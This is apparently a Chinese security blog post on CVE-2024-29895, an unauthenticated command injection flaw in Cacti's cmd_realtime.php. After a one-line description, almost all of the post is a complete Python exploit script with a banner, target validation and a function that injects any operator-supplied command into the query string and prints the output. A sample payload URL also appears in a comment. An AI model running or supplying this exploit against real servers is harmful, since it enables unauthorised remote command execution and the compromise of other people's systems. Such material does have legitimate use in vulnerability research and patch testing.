影响描述
CVE-2024-29895为命令注入漏洞,攻击者可在Cacti服务器的PHP元件启用register_argc_argv功能的情况下,对服务器下达任意命令,过程中无须通过身份验证,CVSS风险评为10分。
poc&exp
# CVE-2024-29895 - RCE in Cacti
#A command injection vulnerability allows any unauthenticated user to execute arbitrary command on the server when register_argc_argv option of PHP is On.
# http://target/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1
# Cacti (PHP)
# Affected versions:
# 1.3.x DEV
# Usage: python3 cve-2024-29895.py http://target.com:8080/ "id"
# Developed by @stuub
import requests
import argparse
import urllib3
from urllib.parse import urlparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#ANSI Colors
red = "\033[91m"
green = "\033[92m"
yellow = "\033[93m"
purple = "\033[95m"
reset = "\033[0m"
def banner():
print(f"""
▄████▄ ▄▄▄ ▄████▄ ▄▄▄█████▓ ██▓ ██▀███ ▄████▄ ▓█████
▒██▀ ▀█ ▒████▄ ▒██▀ ▀█ ▓ ██▒ ▓▒▓██▒ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
▒▓█ ▄ ▒██ ▀█▄ ▒▓█ ▄ ▒ ▓██░ ▒░▒██▒ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
▒▓▓▄ ▄██▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░ ▓██▓ ░ ░██░ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
▒ ▓███▀ ░ ▓█ ▓██▒▒ ▓███▀ ░ ▒██▒ ░ ░██░ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
░ ░▒ ▒ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░ ░▓ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
░ ▒ ▒ ▒▒ ░ ░ ▒ ░ ▒ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
░ ░ ▒ ░ ░ ▒ ░ ░░ ░ ░ ░
░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░
{yellow}CVE-2024-29895 - RCE in Cacti 1.3.x DEV{reset}
{purple}Developed by @stuub{reset}
""")
def validate(url):
endpoint = "/cacti/cmd_realtime.php"
url = url + endpoint
response = requests.get(url, verify=False)
if response.status_code == 200:
print(f"{green}[*]{reset} Found Cacti installation")
return True
else:
print(f"{red}[!]{reset} Cacti not found")
return False
def RCE(url, command):
parsedUrl = urlparse(url)
strippedUrl = f"{parsedUrl.scheme}://{parsedUrl.netloc}"
url = strippedUrl
payload = url + "/cacti/cmd_realtime.php?1+1&&" + command + "+1+1+1"
print (f"{green}[*]{reset} Targeting URL: {yellow}{payload}{reset}")
response = requests.get(payload, verify=False)
print(f"\n{green}[*]{reset} Response:")
formatted = response.text.replace("<br>", "\n")
print(formatted)
def main():
parser = argparse.ArgumentParser(description="CVE-2024-29895 - RCE in Cacti")
parser.add_argument('-u', '--url', help="URL of the target")
parser.add_argument('-c', '--command', help="Command to execute")
args = parser.parse_args()
url = args.url
command = args.command
if url is None or command is None:
print(f"{green}Usage:{reset} python3 cve-2024-29895.py http://target.com:8080/ -c 'id'")
exit()
if validate(url):
RCE(url, command)
if __name__ == "__main__":
banner()
main()
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容